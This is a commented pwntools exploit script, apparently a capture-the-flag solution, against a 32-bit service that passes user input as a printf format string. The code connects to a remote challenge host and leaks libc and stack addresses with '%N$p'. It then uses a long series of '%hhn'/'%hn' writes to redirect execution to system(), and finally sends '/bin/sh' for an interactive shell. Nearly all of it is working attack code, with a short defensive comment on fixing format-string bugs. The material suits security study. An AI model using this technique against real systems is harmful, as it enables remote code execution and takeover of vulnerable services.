# CTF proof-of-concept (pwntools) against a service that passes the "password"
# input to a printf-style function as the format string.  The same bug is used
# first as a read (%N$p) and then as a write (%N$hhn / %N$hn) primitive.
# Defensive takeaway from this script: user-controlled format strings are the
# root cause — call printf("%s", buf) instead, build with -Wformat-security,
# and note that _FORTIFY_SOURCE=2 aborts on %n in a writable format string.
# Written in the old pwntools style with str payloads; newer pwntools versions
# expect bytes on tube I/O (not verifiable from this file alone).
from pwn import *
import time

# Connect to the challenge instance and load the libc the script assumes the
# target runs (32-bit, glibc 2.27).
p = remote('node4.buuoj.cn',25845)
libc = ELF('./libc-2.27_x32.so')
p.sendlineafter('name:','aa')

# Stage 1 - leak.  '%15$p' makes the service print stack slot 15 as a pointer.
p.sendlineafter('password:','%15$p')
p.recvuntil('0x')
# The script treats slot 15 as a libc address lying 0xf1 bytes past
# __libc_start_main (presumably main's return address; the constant is specific
# to this libc build) and derives the libc base and system() from it.
__libc_start_main = int(p.recvuntil('\n',drop=True),16)-0xf1
libc_base = __libc_start_main - libc.symbols['__libc_start_main']
print('libc_base-->'+hex(libc_base))
system = libc_base + libc.sym['system']
print('system-->'+hex(system))

# Two further leaks of stack slots 6 and 10 ("strack" is the author's
# spelling of "stack").  Slot 10's value is reused below as the address that
# later '%10$hhn' writes land on.
p.sendlineafter('Try again!','%6$p')
p.recvuntil('0x')
strack_addr0 = int(p.recvuntil('\n',drop=True),16)
print('strack_addr0-->'+hex(strack_addr0))
p.sendlineafter('Try again!','%10$p')
p.recvuntil('0x')
strack_addr1 = int(p.recvuntil('\n',drop=True),16)
print('strack_addr1-->'+hex(strack_addr1))

# Unused leftover: looks like a gdb breakpoint command from debugging; nothing
# below reads it.
cmd = 'b *0x08048575\n'

# Stage 2 - byte-wise writes.  Each round prints N padding characters with
# '%Nc' and then '%K$hhn' stores the low byte of the running character count
# through the pointer held in stack slot K.  Rounds alternate between writing
# a value via slot 10 and adjusting the low byte of slot 10's pointer via slot
# 6 (slot 6 presumably points at slot 10's cell — not visible here).  The
# bytes written through slot 10 are 0x14,0xb0,0x04,0x08, i.e. little-endian
# 0x0804b014; the fixed 0x0804xxxx value suggests a non-PIE 32-bit binary.
payload = '%'+str(0x14)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload)
payload1 = '%'+str((strack_addr1 & 0xff)+1)+'c'+'%6$hhn'
p.sendlineafter('Try again!\n',payload1)
payload2 = '%'+str(0xb0)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload2)
payload3 = '%'+str((strack_addr1 & 0xff)+2)+'c'+'%6$hhn'
p.sendlineafter('Try again!\n',payload3)
payload4 = '%'+str(0x04)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload4)
payload5 = '%'+str((strack_addr1 & 0xff)+3)+'c'+'%6$hhn'
p.sendlineafter('Try again!\n',payload5)
payload6 = '%'+str(0x08)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload6)

# Same eight-round pattern for the next 4-byte stack word, this time writing
# 0x15,0xb0,0x04,0x08 (little-endian 0x0804b015) — the previous value plus one.
# Note that the '+4' below rebinds strack_addr1; the '& 0xff' arithmetic
# assumes the low byte does not wrap across a 0x100 boundary.
strack_addr1 = strack_addr1 + 4
payload1 = '%'+str(strack_addr1 & 0xff)+'c'+'%6$hhn'
p.sendlineafter('Try again!\n',payload1)
payload2 = '%'+str(0x15)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload2)
payload3 = '%'+str((strack_addr1 & 0xff)+1)+'c'+'%6$hhn'
p.sendlineafter('Try again!\n',payload3)
payload4 = '%'+str(0xb0)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload4)
payload5 = '%'+str((strack_addr1 & 0xff)+2)+'c'+'%6$hhn'
p.sendlineafter('Try again!\n',payload5)
payload6 = '%'+str(0x04)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload6)
payload7 = '%'+str((strack_addr1 & 0xff)+3)+'c'+'%6$hhn'
p.sendlineafter('Try again!\n',payload7)
payload8 = '%'+str(0x08)+'c'+'%10$hhn'
p.sendlineafter('Try again!\n',payload8)

# Stage 3 - one combined format string: '%14$hhn' stores the low byte of
# system's address, then '%15$hn' stores the next two bytes.  The %n count is
# cumulative, so the second width subtracts what the first specifier already
# printed; the script hard-codes that as 0x10, which only matches if
# system & 0xff == 0x10 for this libc (the print shows the width it used).
payload = '%'+str(system & 0xff)+'c'+'%14$hhn'
payload += '%'+str(((system & 0xffff00)>>8)-0x10)+'c'+'%15$hn'
print(hex(((system & 0xffff00)>>8)-0x10))
p.sendlineafter('Try again!\n',payload)

# Give the service a moment before sending the string it will now read as a
# command, then hand the session to the user.
time.sleep(0.5)
p.sendline('/bin/sh')
p.interactive()